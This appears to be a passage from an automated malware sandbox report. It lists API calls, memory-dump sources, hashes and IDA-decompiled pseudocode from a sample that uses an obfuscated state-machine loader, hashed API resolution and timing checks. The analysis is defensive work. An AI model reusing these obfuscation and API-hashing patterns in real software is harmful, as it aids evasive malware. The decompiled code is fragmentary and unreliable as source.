                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: #100
                                                        • String ID:
                                                        • API String ID: 1341478452-0
                                                        • Opcode ID: d4e268cc97b58db7afbd037e22066ed19d30ab43755ea501b5b541365aee3679
                                                        • Instruction ID: 1c47987104be7645d0cf7a4a22aa43c13d53cea405b34bf9c6b133d2953e3e55
                                                        • Opcode Fuzzy Hash: d4e268cc97b58db7afbd037e22066ed19d30ab43755ea501b5b541365aee3679
                                                        • Instruction Fuzzy Hash: 0D810EA244E7D14FC7038B748968691BFB1AE13220B1E42DBC5C1DF1F3D6AD484AC76A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 75%
                                                        			E003F7080(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
                                                        				struct HINSTANCE__* _t6;
                                                        				intOrPtr* _t7;
                                                        				intOrPtr* _t9;
                                                        				intOrPtr _t17;
                                                        				signed int _t28;
                                                        				void* _t29;
                                                        				WCHAR* _t30;
                                                        				void* _t31;
                                                        
                                                        				_t15 = __ebx;
                                                        				_t28 = __edx;
                                                        				_t30 = E003F34C0(__ecx);
                                                        				if( *0x3fdd1c == 0) {
                                                        					 *0x3fdd1c = E003F3E60(__ebx, E003F3F00(0x9bab0b12), 0xe4b28d97, _t31);
                                                        				}
                                                        				_t6 = LoadLibraryW(_t30);
                                                        				_t17 =  *0x3fe548; // 0x598118
                                                        				 *(_t17 + 0x30 + _t28 * 4) = _t6;
                                                        				_t7 =  *0x3fe494;
                                                        				if(_t7 == 0) {
                                                        					_t7 = E003F3E60(_t15, E003F3F00(0x9bab0b12), 0x7facde30, _t31);
                                                        					 *0x3fe494 = _t7;
                                                        				}
                                                        				_t29 =  *_t7();
                                                        				_t9 =  *0x3fdf30;
                                                        				if(_t9 == 0) {
                                                        					_t9 = E003F3E60(_t15, E003F3F00(0x9bab0b12), 0x5010a54d, _t31);
                                                        					 *0x3fdf30 = _t9;
                                                        				}
                                                        				return  *_t9(_t29, 0, _t30);
                                                        			}











                                                        0x003f7080
                                                        0x003f7082
                                                        0x003f7089
                                                        0x003f7092
                                                        0x003f70aa
                                                        0x003f70aa
                                                        0x003f70b0
                                                        0x003f70b2
                                                        0x003f70b8
                                                        0x003f70bc
                                                        0x003f70c3
                                                        0x003f70d6
                                                        0x003f70db
                                                        0x003f70db
                                                        0x003f70e2
                                                        0x003f70e4
                                                        0x003f70eb
                                                        0x003f70fe
                                                        0x003f7103
                                                        0x003f7103
                                                        0x003f7110

                                                        APIs
                                                        • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,003F721D,003F68AC), ref: 003F70B0
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256698017.00000000003F1000.00000020.00000001.sdmp, Offset: 003F0000, based on PE: true
                                                        • Associated: 00000007.00000002.2256695140.00000000003F0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256705457.00000000003FD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256709121.00000000003FF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_3f0000_tmp_e473b4.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: a6036d3da953af87f96de44acf2077ae74002f5b619abe1e2967873a9adc495d
                                                        • Instruction ID: 52a00d665ccb20fea9b38826814d8502566607fe692e768658ad40a1f5979e33
                                                        • Opcode Fuzzy Hash: a6036d3da953af87f96de44acf2077ae74002f5b619abe1e2967873a9adc495d
                                                        • Instruction Fuzzy Hash: 39014F317243194B9B17AF7A985563E2AAF9FE0788B11002DB519CF269EE34CD01D791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 003E0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 003E0F08
                                                          • Part of subcall function 003E0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 003E0F3E
                                                          • Part of subcall function 003E0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 003E0F7F
                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?), ref: 003E02F6
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256690931.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_3e0000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$FreeVirtual
                                                        • String ID:
                                                        • API String ID: 223123264-0
                                                        • Opcode ID: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                        • Instruction ID: d8c5d3480e2e5ae356036c3dd45c0d7e47fdce67606a9e74f2ea6c2ec6436ce7
                                                        • Opcode Fuzzy Hash: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                        • Instruction Fuzzy Hash: 7A513AB19002A8EBDB24DF65DD84BDEB778EF88700F004599E509BB290DBB45E85CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        APIs
                                                        • __vbaFailedFriend.MSVBVM60(00000000,?,00000000), ref: 0041FA81
                                                        • __vbaNew.MSVBVM60(00411590,00000000,?,00000000), ref: 0041FA91
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041FA9C
                                                        • __vbaStrCmp.MSVBVM60(0040F38C,0008000F), ref: 0041FAAE
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401938,004113E8,00000034), ref: 0041FAD2
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401938,004113E8,00000034), ref: 0041FB02
                                                        • __vbaStrCopy.MSVBVM60 ref: 0041FB1E
                                                        • __vbaStrCopy.MSVBVM60 ref: 0041FB29
                                                        • __vbaStrCmp.MSVBVM60(0040F38C,?), ref: 0041FB49
                                                        • __vbaInStr.MSVBVM60(00000000,00411600,?,00000001), ref: 0041FB64
                                                        • #581.MSVBVM60(?), ref: 0041FB6E
                                                        • __vbaFpI4.MSVBVM60 ref: 0041FB74
                                                        • __vbaInStr.MSVBVM60(00000000,00411600,?,00000001,?), ref: 0041FB94
                                                        • #631.MSVBVM60(?,-00000001), ref: 0041FBA4
                                                        • __vbaStrMove.MSVBVM60 ref: 0041FBAF
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041FBB8
                                                        • __vbaInStr.MSVBVM60(00000000,00411600,?,00000001), ref: 0041FBCB
                                                        • #581.MSVBVM60(?), ref: 0041FBD5
                                                        • __vbaFpI4.MSVBVM60 ref: 0041FBDB
                                                        • __vbaInStr.MSVBVM60(00000000,00411600,?,00000001,?), ref: 0041FBFB
                                                        • #631.MSVBVM60(?,-00000001), ref: 0041FC0B
                                                        • __vbaStrMove.MSVBVM60 ref: 0041FC16
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041FC1F
                                                        • __vbaStrCmp.MSVBVM60(0040F38C,?), ref: 0041FC30
                                                        • #581.MSVBVM60(?), ref: 0041FC3E
                                                        • __vbaFpI4.MSVBVM60 ref: 0041FC44
                                                        • __vbaStrCopy.MSVBVM60 ref: 0041FC51
                                                        • __vbaNew.MSVBVM60(0040BAAC), ref: 0041FC5C
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041FC67
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411614,00000028), ref: 0041FC8C
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411614,00000030), ref: 0041FCB1
                                                        • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0041FCD6
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411580,00000020), ref: 0041FD14
                                                        • __vbaCastObj.MSVBVM60(?,00411614), ref: 0041FD23
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041FD2E
                                                        • __vbaFreeObj.MSVBVM60 ref: 0041FD37
                                                        • __vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 0041FD4B
                                                        • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0041FD61
                                                        • __vbaFreeObj.MSVBVM60(0041FDB9), ref: 0041FDA8
                                                        • __vbaFreeStr.MSVBVM60 ref: 0041FDAD
                                                        • __vbaFreeObj.MSVBVM60 ref: 0041FDB6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Free$CheckHresult$#581Copy$#631AddrefMove$CastFailedFriendList
                                                        • String ID: @$10,10,15,15$10,10,20,20$5,5,10,10,15,15
                                                        • API String ID: 2647318331-3347459593
                                                        • Opcode ID: 8bccfc0f73f2096b138939d07a6f7335f976992a7d271db61b2400860999791c
                                                        • Instruction ID: d7b64355bc1eab8fc6c8e0e34e1b674775aefac8dba8eaecf672c991d6fd1ed2
                                                        • Opcode Fuzzy Hash: 8bccfc0f73f2096b138939d07a6f7335f976992a7d271db61b2400860999791c
                                                        • Instruction Fuzzy Hash: F9C12F71A00209EFDB14DFA4DD89AEEBBB9FF48701F10412AE505B7260D774A946CB68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 81%
                                                        			E003F65E0() {
                                                        				intOrPtr _v8;
                                                        				char _v16;
                                                        				char _v24;
                                                        				intOrPtr _v28;
                                                        				signed int _v32;
                                                        				intOrPtr _v36;
                                                        				intOrPtr _v40;
                                                        				char _v48;
                                                        				char _v76;
                                                        				signed int _v80;
                                                        				char _v88;
                                                        				char _v96;
                                                        				char _v100;
                                                        				char _v104;
                                                        				char _v112;
                                                        				signed int _v116;
                                                        				unsigned int _v120;
                                                        				signed int _v124;
                                                        				signed int _v128;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				intOrPtr _t205;
                                                        				signed int _t207;
                                                        				signed int _t211;
                                                        				void* _t221;
                                                        				void* _t228;
                                                        				signed int _t237;
                                                        				signed int _t239;
                                                        				void* _t241;
                                                        				void* _t242;
                                                        				signed int _t246;
                                                        				signed int _t254;
                                                        				signed int _t261;
                                                        				void* _t263;
                                                        				signed int _t265;
                                                        				signed int _t266;
                                                        				char* _t267;
                                                        				intOrPtr* _t268;
                                                        				void* _t273;
                                                        				intOrPtr _t275;
                                                        				void* _t276;
                                                        				signed int _t277;
                                                        				void* _t278;
                                                        				void* _t279;
                                                        				void* _t280;
                                                        				void* _t283;
                                                        				signed int _t291;
                                                        				signed int _t296;
                                                        				signed int _t299;
                                                        				void* _t301;
                                                        				void* _t302;
                                                        				intOrPtr* _t303;
                                                        				void* _t304;
                                                        				intOrPtr* _t307;
                                                        				signed int _t308;
                                                        				void* _t309;
                                                        				void* _t310;
                                                        				void* _t313;
                                                        				void* _t314;
                                                        				intOrPtr* _t315;
                                                        				void* _t316;
                                                        				intOrPtr* _t319;
                                                        				signed int _t320;
                                                        				void* _t321;
                                                        				signed int _t327;
                                                        				signed int _t335;
                                                        				intOrPtr _t344;
                                                        				intOrPtr _t360;
                                                        				signed int _t383;
                                                        				unsigned int _t388;
                                                        				unsigned int _t392;
                                                        				signed int _t413;
                                                        				signed int _t418;
                                                        				void* _t426;
                                                        				void* _t429;
                                                        				signed int _t433;
                                                        				signed int _t435;
                                                        				signed int _t438;
                                                        				void* _t442;
                                                        				unsigned int _t446;
                                                        				signed int _t451;
                                                        				void* _t453;
                                                        				void* _t454;
                                                        				void* _t456;
                                                        				void* _t457;
                                                        				void* _t458;
                                                        				void* _t459;
                                                        
                                                        				_t453 = (_t451 & 0xfffffff8) - 0x80;
                                                        				_t327 = _v124;
                                                        				_t204 = 0x10e9bb52;
                                                        				_t446 = _v120;
                                                        				while(1) {
                                                        					L1:
                                                        					_t413 = _v116;
                                                        					while(1) {
                                                        						L2:
                                                        						_t426 = 0x3251fefe;
                                                        						do {
                                                        							while(1) {
                                                        								L3:
                                                        								_t456 = _t204 - 0x1bc488ca;
                                                        								if(_t456 > 0) {
                                                        									break;
                                                        								}
                                                        								if(_t456 == 0) {
                                                        									_t254 = E003F94D0();
                                                        									asm("sbb eax, eax");
                                                        									_t204 = ( ~_t254 & 0x12be9560) + 0x15f108c5;
                                                        									continue;
                                                        								} else {
                                                        									_t457 = _t204 - 0xc403738;
                                                        									if(_t457 > 0) {
                                                        										__eflags = _t204 - 0x15f108c5;
                                                        										if(__eflags > 0) {
                                                        											__eflags = _t204 - 0x1ba0f19f;
                                                        											if(__eflags > 0) {
                                                        												__eflags = _t204 - 0x1ba655e5;
                                                        												if(_t204 != 0x1ba655e5) {
                                                        													goto L44;
                                                        												} else {
                                                        													_v28 = E003F5FF0();
                                                        													_t204 = 0x1a1794c0;
                                                        													continue;
                                                        												}
                                                        											} else {
                                                        												if(__eflags == 0) {
                                                        													_t204 = 0x1cd4381f;
                                                        													continue;
                                                        												} else {
                                                        													__eflags = _t204 - 0x1a1794c0;
                                                        													if(_t204 == 0x1a1794c0) {
                                                        														E003F61E0( &_v24);
                                                        														_t204 = 0x34aece17;
                                                        														continue;
                                                        													} else {
                                                        														__eflags = _t204 - 0x1b363693;
                                                        														if(_t204 != 0x1b363693) {
                                                        															goto L44;
                                                        														} else {
                                                        															E003F4220(_t327, _v16);
                                                        															_t204 = 0x2ff16e51;
                                                        															continue;
                                                        														}
                                                        													}
                                                        												}
                                                        											}
                                                        										} else {
                                                        											if(__eflags == 0) {
                                                        												E003F9F30(_t327);
                                                        												_t261 =  *0x3fe28c; // 0x0
                                                        												_t413 = 0x1ba0f19f;
                                                        												_v116 = 0x1ba0f19f;
                                                        												__eflags = _t261;
                                                        												if(_t261 == 0) {
                                                        													_t263 = E003F3F00(0x9bab0b12);
                                                        													_t392 = 0xb90a6ccf;
                                                        													_t261 = E003F3E60(_t327, _t263, 0xb90a6ccf, _t446);
                                                        													 *0x3fe28c = _t261;
                                                        												}
                                                        												_t327 =  *_t261();
                                                        												_t446 = _t392;
                                                        												_t204 = 0xc403738;
                                                        												continue;
                                                        											} else {
                                                        												__eflags = _t204 - 0x10d6bdbf;
                                                        												if(__eflags > 0) {
                                                        													__eflags = _t204 - 0x10e9bb52;
                                                        													if(_t204 != 0x10e9bb52) {
                                                        														goto L44;
                                                        													} else {
                                                        														_t204 = 0x2e428786;
                                                        														continue;
                                                        													}
                                                        												} else {
                                                        													if(__eflags == 0) {
                                                        														E003F86E0();
                                                        														_t204 = 0xd118b9c;
                                                        														continue;
                                                        													} else {
                                                        														__eflags = _t204 - 0xd118b9c;
                                                        														if(_t204 == 0xd118b9c) {
                                                        															_t265 = E003FB430( &_v88, _t446);
                                                        															__eflags = _t265;
                                                        															if(_t265 != 0) {
                                                        																asm("xorps xmm0, xmm0");
                                                        																_t413 = 0x1a1794c0;
                                                        																asm("movlpd [esp+0x18], xmm0");
                                                        																_t446 = _v120;
                                                        																_t327 = _v124;
                                                        																_v116 = 0x1a1794c0;
                                                        															}
                                                        															goto L72;
                                                        														} else {
                                                        															__eflags = _t204 - 0xf3a9fea;
                                                        															if(_t204 != 0xf3a9fea) {
                                                        																goto L44;
                                                        															} else {
                                                        																_t266 = E003F6060( &_v76, _t392, _t446);
                                                        																__eflags = _t266;
                                                        																if(_t266 == 0) {
                                                        																	_t204 = 0x32f9862d;
                                                        																} else {
                                                        																	_t267 =  &_v76;
                                                        																	_t392 = 0x24b1f8c4;
                                                        																	_v48 = _t267;
                                                        																	_t268 = E003F4160(_t327, 0x9bab0b12, 0x24b1f8c4, _t446, 0x218);
                                                        																	_t453 = _t453 + 4;
                                                        																	_v48 =  *_t268(_t267);
                                                        																	_t204 = 0x39301ec9;
                                                        																}
                                                        																continue;
                                                        															}
                                                        														}
                                                        													}
                                                        												}
                                                        											}
                                                        										}
                                                        									} else {
                                                        										if(_t457 == 0) {
                                                        											__eflags = _t327 | _t446;
                                                        											if((_t327 | _t446) != 0) {
                                                        												_v124 = 0xcb73;
                                                        												_v124 = _v124 ^ 0x0a3afb83;
                                                        												_v124 = _v124 >> 0xe;
                                                        												_v124 = _v124 << 0xf;
                                                        												_v124 = _v124 * 0x63;
                                                        												_v124 = _v124 ^ 0xe8dc00a0;
                                                        												_t273 = E003F5D10();
                                                        												__eflags = _t273 - _v124;
                                                        												if(_t273 <= _v124) {
                                                        													_t388 = 0;
                                                        													__eflags = 0;
                                                        												} else {
                                                        													__eflags =  *0x3fde08;
                                                        													if( *0x3fde08 == 0) {
                                                        														 *0x3fde08 = E003F3E60(_t327, E003F3F00(0x9bab0b12), 0xd8ef4c49, _t446);
                                                        													}
                                                        													_v124 = 0xcb73;
                                                        													_v124 = _v124 ^ 0x0a3afb83;
                                                        													_v124 = _v124 >> 0xe;
                                                        													_v124 = _v124 << 0xf;
                                                        													_v124 = _v124 * 0x63;
                                                        													_v124 = _v124 ^ 0xe8dc00a0;
                                                        													_t283 = E003F5D10();
                                                        													_t388 = GetTickCount() % (_t283 - _v124);
                                                        												}
                                                        												_v124 = 0xcb73;
                                                        												_v124 = _v124 ^ 0x0a3afb83;
                                                        												_v124 = _v124 >> 0xe;
                                                        												_v124 = _v124 << 0xf;
                                                        												_v124 = _v124 * 0x63;
                                                        												_v124 = _v124 ^ 0xe8dc00a0;
                                                        												_t335 =  *0x3fdb5c;
                                                        												_t429 = _v124 + _t388;
                                                        												__eflags = _t335;
                                                        												if(_t335 == 0) {
                                                        													_t280 = E003F3F00(0x9bab0b12);
                                                        													_t388 = 0x2194248e;
                                                        													_t335 = E003F3E60(_t327, _t280, 0x2194248e, _t446);
                                                        													 *0x3fdb5c = _t335;
                                                        												}
                                                        												_t275 =  *0x3fe550; // 0x0
                                                        												_t276 =  *_t335( *((intOrPtr*)(_t275 + 0x14)), _t429);
                                                        												__eflags = _t276 - 0x102;
                                                        												if(_t276 == 0x102) {
                                                        													_t277 =  *0x3fe28c; // 0x0
                                                        													__eflags = _t277;
                                                        													if(_t277 == 0) {
                                                        														_t279 = E003F3F00(0x9bab0b12);
                                                        														_t388 = 0xb90a6ccf;
                                                        														_t277 = E003F3E60(_t327, _t279, 0xb90a6ccf, _t446);
                                                        														 *0x3fe28c = _t277;
                                                        													}
                                                        													_t278 =  *_t277();
                                                        													__eflags = _t388 - _t446;
                                                        													if(__eflags < 0) {
                                                        														L137:
                                                        														_t204 = 0xc403738;
                                                        														goto L1;
                                                        													} else {
                                                        														if(__eflags > 0) {
                                                        															L60:
                                                        															_t413 = _v124;
                                                        															_t426 = 0x3251fefe;
                                                        															_t204 = _t413;
                                                        															goto L44;
                                                        														} else {
                                                        															__eflags = _t278 - _t327;
                                                        															if(_t278 < _t327) {
                                                        																goto L137;
                                                        															} else {
                                                        																goto L60;
                                                        															}
                                                        														}
                                                        													}
                                                        												} else {
                                                        													_t204 = 0x32f9862d;
                                                        													while(1) {
                                                        														L1:
                                                        														_t413 = _v116;
                                                        														while(1) {
                                                        															L2:
                                                        															_t426 = 0x3251fefe;
                                                        															goto L3;
                                                        														}
                                                        													}
                                                        												}
                                                        											} else {
                                                        												_t204 = _t413;
                                                        												goto L44;
                                                        											}
                                                        										} else {
                                                        											_t458 = _t204 - 0x99d9f33;
                                                        											if(_t458 > 0) {
                                                        												__eflags = _t204 - 0xb7b0115;
                                                        												if(__eflags > 0) {
                                                        													__eflags = _t204 - 0xc039e9a;
                                                        													if(_t204 != 0xc039e9a) {
                                                        														goto L44;
                                                        													} else {
                                                        														E003F8700(_t327);
                                                        														_t204 = 0x28af9e25;
                                                        														continue;
                                                        													}
                                                        												} else {
                                                        													if(__eflags == 0) {
                                                        														E003F7120(_t327);
                                                        														_t204 = 0x3697b389;
                                                        														continue;
                                                        													} else {
                                                        														__eflags = _t204 - 0xb253d66;
                                                        														if(_t204 == 0xb253d66) {
                                                        															E003F4220(_t327, _v112);
                                                        															_t204 = 0x50dcbff;
                                                        															continue;
                                                        														} else {
                                                        															__eflags = _t204 - 0xb765cf9;
                                                        															if(_t204 != 0xb765cf9) {
                                                        																goto L44;
                                                        															} else {
                                                        																_t291 = E003F8400(_t327, _t446);
                                                        																_t344 =  *0x3fe54c; // 0x55f0b0
                                                        																__eflags = _t291;
                                                        																if(_t291 == 0) {
                                                        																	__eflags =  *(_t344 + 0x220);
                                                        																	_t204 =  !=  ? 0x2200eb3b : 0x2e7e0c52;
                                                        																} else {
                                                        																	__eflags =  *(_t344 + 0x220);
                                                        																	_t204 =  !=  ? 0x1bc488ca : 0x15f108c5;
                                                        																}
                                                        																continue;
                                                        															}
                                                        														}
                                                        													}
                                                        												}
                                                        											} else {
                                                        												if(_t458 == 0) {
                                                        													_v124 = 0xe61e;
                                                        													_v124 = _v124 >> 2;
                                                        													_v124 = _v124 ^ 0x01340267;
                                                        													_v32 = _v124;
                                                        													_t204 = 0x1ba655e5;
                                                        													continue;
                                                        												} else {
                                                        													_t459 = _t204 - 0x4d162d3;
                                                        													if(_t459 > 0) {
                                                        														__eflags = _t204 - 0x50dcbff;
                                                        														if(_t204 == 0x50dcbff) {
                                                        															E003F4220(_t327, _v96);
                                                        															_t204 = 0x1b363693;
                                                        															continue;
                                                        														} else {
                                                        															__eflags = _t204 - 0x62c3963;
                                                        															if(_t204 != 0x62c3963) {
                                                        																goto L44;
                                                        															} else {
                                                        																_t392 =  &_v88;
                                                        																_t296 = E003F7650( &_v112, _t392);
                                                        																__eflags = _t296;
                                                        																if(_t296 == 0) {
                                                        																	L72:
                                                        																	_t204 = 0xb253d66;
                                                        																} else {
                                                        																	E003FAFE0(0);
                                                        																	_t383 = _v80;
                                                        																	_t204 = 0x10d6bdbf;
                                                        																	__eflags = _t383;
                                                        																	if(_t383 != 0) {
                                                        																		__eflags = _t383 - 7;
                                                        																		_t204 =  ==  ? _t426 : 0x10d6bdbf;
                                                        																	}
                                                        																}
                                                        																continue;
                                                        															}
                                                        														}
                                                        													} else {
                                                        														if(_t459 == 0) {
                                                        															_v116 = 0x4b49;
                                                        															_v116 = _v116 << 0x10;
                                                        															_v116 = _v116 ^ 0x4b490001;
                                                        															_t299 = E003F12B0(_v116,  &_v96,  &_v112);
                                                        															_t454 = _t453 + 4;
                                                        															__eflags = _t299;
                                                        															if(_t299 == 0) {
                                                        																E003F1290();
                                                        																_t413 = 0x1a1794c0;
                                                        																_v116 = 0x1a1794c0;
                                                        																_t301 = E003F5DA0();
                                                        																_t302 = E003F5E00();
                                                        																__eflags = _t301 - _t302;
                                                        																if(_t301 <= _t302) {
                                                        																	_t433 = 0;
                                                        																	__eflags = 0;
                                                        																} else {
                                                        																	_t307 = E003F4160(_t327, 0x9bab0b12, 0xd8ef4c49, _t446, 0xca);
                                                        																	_t454 = _t454 + 4;
                                                        																	_t308 =  *_t307();
                                                        																	_t309 = E003F5DA0();
                                                        																	_t310 = E003F5E00();
                                                        																	_t413 = _v116;
                                                        																	_t433 = _t308 % (_t309 - _t310);
                                                        																}
                                                        																_t392 = 0xb90a6ccf;
                                                        																_t303 = E003F4160(_t327, 0x9bab0b12, 0xb90a6ccf, _t446, 0x1eb);
                                                        																_t453 = _t454 + 4;
                                                        																_t304 =  *_t303();
                                                        																_t446 = 0xb90a6ccf;
                                                        																_t327 = _t304 + E003F5E00() + _t433;
                                                        																_t204 = 0x50dcbff;
                                                        																asm("adc ebp, 0x0");
                                                        															} else {
                                                        																_t413 = 0x1a1794c0;
                                                        																_v116 = 0x1a1794c0;
                                                        																_t313 = E003F5E80();
                                                        																_t314 = E003F5E50();
                                                        																__eflags = _t314 - _t313;
                                                        																if(_t314 <= _t313) {
                                                        																	_t435 = 0;
                                                        																	__eflags = 0;
                                                        																} else {
                                                        																	_t319 = E003F4160(_t327, 0x9bab0b12, 0xd8ef4c49, _t446, 0xca);
                                                        																	_t454 = _t454 + 4;
                                                        																	_t320 =  *_t319();
                                                        																	_t321 = E003F5E80();
                                                        																	_t435 = _t320 % (E003F5E50() - _t321);
                                                        																}
                                                        																_t392 = 0xb90a6ccf;
                                                        																_t315 = E003F4160(_t327, 0x9bab0b12, 0xb90a6ccf, _t446, 0x1eb);
                                                        																_t453 = _t454 + 4;
                                                        																_t316 =  *_t315();
                                                        																_t446 = 0xb90a6ccf;
                                                        																_t327 = _t316 + E003F5E80() + _t435;
                                                        																_t204 = 0x62c3963;
                                                        																asm("adc ebp, 0x0");
                                                        															}
                                                        															while(1) {
                                                        																L2:
                                                        																_t426 = 0x3251fefe;
                                                        																goto L3;
                                                        															}
                                                        														} else {
                                                        															if(_t204 == 0x1b08adb) {
                                                        																_t204 = 0x3355994e;
                                                        																continue;
                                                        															} else {
                                                        																if(_t204 != 0x2609a3b) {
                                                        																	goto L44;
                                                        																} else {
                                                        																	E003F9620(_t446);
                                                        																	_t204 = 0x28a63df9;
                                                        																	continue;
                                                        																}
                                                        															}
                                                        														}
                                                        													}
                                                        												}
                                                        											}
                                                        										}
                                                        									}
                                                        								}
                                                        								L150:
                                                        							}
                                                        							__eflags = _t204 - 0x2ff16e51;
                                                        							if(__eflags > 0) {
                                                        								__eflags = _t204 - 0x3355994e;
                                                        								if(__eflags > 0) {
                                                        									__eflags = _t204 - 0x37e57243;
                                                        									if(__eflags > 0) {
                                                        										__eflags = _t204 - 0x39301ec9;
                                                        										if(_t204 != 0x39301ec9) {
                                                        											goto L44;
                                                        										} else {
                                                        											_t205 =  *0x3fe54c; // 0x55f0b0
                                                        											_t202 = _t205 + 0x46c; // 0x20abfa8f
                                                        											_v8 =  *_t202;
                                                        											_t204 = 0x22e7b396;
                                                        											goto L3;
                                                        										}
                                                        									} else {
                                                        										if(__eflags == 0) {
                                                        											_t392 =  &_v96;
                                                        											_t207 = E003F7410( &_v48, _t392);
                                                        											asm("sbb eax, eax");
                                                        											_t204 = ( ~_t207 & 0xe99b2c40) + 0x1b363693;
                                                        											goto L3;
                                                        										} else {
                                                        											__eflags = _t204 - 0x34aece17;
                                                        											if(_t204 == 0x34aece17) {
                                                        												E003FB1D0( &_v16);
                                                        												_t204 = 0x37e57243;
                                                        												goto L3;
                                                        											} else {
                                                        												__eflags = _t204 - 0x3697b389;
                                                        												if(_t204 != 0x3697b389) {
                                                        													goto L44;
                                                        												} else {
                                                        													_t211 = E003F9860();
                                                        													__eflags = _t211;
                                                        													if(_t211 == 0) {
                                                        														goto L128;
                                                        													} else {
                                                        														_t204 = 0x26a7c4f3;
                                                        														goto L3;
                                                        													}
                                                        												}
                                                        											}
                                                        										}
                                                        									}
                                                        								} else {
                                                        									if(__eflags == 0) {
                                                        										_v124 = 0x96c3;
                                                        										_v124 = _v124 + 0x17b8;
                                                        										_v116 = 0xf3a9fea;
                                                        										_v124 = 0x8d3dcb09 * _v124 >> 0x20 >> 4;
                                                        										_v124 = _v124 + 0xffff1bdc;
                                                        										_v124 = _v124 + 0x2513;
                                                        										_v124 = _v124 * 0x64;
                                                        										_v124 = _v124 + 0x37c0;
                                                        										_v124 = _v124 + 0xffff909a;
                                                        										_v124 = (_v124 << 6) - _v124;
                                                        										_v124 = _v124 ^ 0xee286cba;
                                                        										_v128 = 0x39e7;
                                                        										_v128 = _v128 | 0x1ba4dd87;
                                                        										_v128 = _v128 + 0x949;
                                                        										_v128 = 0x38e38e39 * _v128 >> 0x20 >> 4;
                                                        										_v128 = _v128 ^ 0x47e6e439;
                                                        										_v128 = _v128 ^ 0x2b9fcd36;
                                                        										_v128 = _v128 >> 7;
                                                        										_v128 = _v128 << 0xa;
                                                        										_v128 = _v128 + 0xded3;
                                                        										_v128 = _v128 ^ 0x60dbe593;
                                                        										__eflags = _v124 - _v128;
                                                        										if(_v124 <= _v128) {
                                                        											_t418 = 0;
                                                        											__eflags = 0;
                                                        										} else {
                                                        											__eflags =  *0x3fde08;
                                                        											if( *0x3fde08 == 0) {
                                                        												 *0x3fde08 = E003F3E60(_t327, E003F3F00(0x9bab0b12), 0xd8ef4c49, _t446);
                                                        											}
                                                        											_v124 = 0x39e7;
                                                        											_v124 = _v124 | 0x1ba4dd87;
                                                        											_v124 = _v124 + 0x949;
                                                        											_v124 = 0x38e38e39 * _v124 >> 0x20 >> 4;
                                                        											_v124 = _v124 ^ 0x47e6e439;
                                                        											_v124 = _v124 ^ 0x2b9fcd36;
                                                        											_v124 = _v124 >> 7;
                                                        											_v124 = _v124 << 0xa;
                                                        											_v124 = _v124 + 0xded3;
                                                        											_v124 = _v124 ^ 0x60dbe593;
                                                        											_t228 = E003F5EE0();
                                                        											_t418 = GetTickCount() % (_t228 - _v124);
                                                        										}
                                                        										_t438 =  *0x3fe28c; // 0x0
                                                        										__eflags = _t438;
                                                        										if(_t438 == 0) {
                                                        											_t438 = E003F3E60(_t327, E003F3F00(0x9bab0b12), 0xb90a6ccf, _t446);
                                                        											 *0x3fe28c = _t438;
                                                        										}
                                                        										_v124 = 0x39e7;
